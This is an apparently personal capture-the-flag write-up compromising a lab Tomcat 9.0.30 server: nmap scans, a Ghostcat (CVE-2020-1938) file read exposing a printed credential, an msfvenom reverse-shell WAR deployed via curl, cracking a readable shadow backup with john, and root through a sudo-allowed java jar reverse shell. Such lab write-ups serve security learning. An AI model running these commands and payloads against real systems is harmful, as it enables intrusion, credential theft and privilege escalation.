Port scanning

nmap --min-rate=10000 -p- 10.10.255.237
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:43 UTC
Nmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)
Host is up (0.0091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
8009/tcp open ajp13
8080/tcp open http-proxy
MAC Address: 02:74:3F:1B:8A:3F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.46 seconds

nmap -sT -sV -sC -O -p8009,8080 10.10.255.237
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:49 UTC
Nmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)
Host is up (0.00044s latency).

PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:74:3F:1B:8A:3F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds

nmap --script=vuln -p8009,8080 10.10.255.237
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:50 UTC
Nmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)
Host is up (0.00022s latency).

PORT STATE SERVICE
8009/tcp open ajp13
8080/tcp open http-proxy
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 )
| /manager/html: Apache Tomcat (401 )
|_ /docs/: Potentially interesting folder
MAC Address: 02:74:3F:1B:8A:3F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 44.75 seconds

Getshell

Port 8080 is running Tomcat, but the default tomcat/tomcat credentials do not work. Maybe I need to look into Apache JServ.

This looks very similar to the tomghost room I did earlier, so let's try CVE-2020-1938 (Ghostcat).

https://github.com/00theway/Ghostcat-CNVD-2020-10487.git

python3 ajpShooter.py http://10.10.255.237:8080 8009 /WEB-INF/web.xml read

Found a credential:

webdev:Hgj3LA$02D$Fa@21

I can log in with it, but the manager still returns 403 and I can't do much there.

But we can upload a WAR.

A .war file is a Java Web Application Archive. It is a common way of packaging and deploying web applications built with Java. A .war file is actually a ZIP archive containing all the resources and files the web application needs to run in a Java Servlet container.

Try uploading a reverse shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.38.245 LPORT=443 -f war -o shell1.war
curl --user 'webdev' --upload-file shell1.war "http://10.10.255.237:8080/manager/text/deploy?path=/shell/shell1.war"

Then open /shell/shell1.war in the browser and the reverse shell comes back.

Moved the session into msf.

No obvious direction, so I uploaded linpeas.

Privilege escalation

/var/shadow-backup-alt.gz appears to be readable, and it is a backup of shadow.

Download it via base64; we also need /etc/passwd.

unshadow passwd shadow >shadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

Result:

794613852 (jdk-admin)

Switch to that user; sudo -l shows we can run jar files as root, so one more reverse shell:

msfvenom -p java/shell_reverse_tcp LHOST=10.11.38.245 LPORT=443 -f jar -o shell.jar

After uploading it, start a listener and run:

sudo /usr/bin/java -jar shell.jar

We are root!

Ramblings

Tomcat again. I remember this year's 闽盾杯 also had a Tomcat challenge; too bad I couldn't solve it at the time. Also, msf is really handy.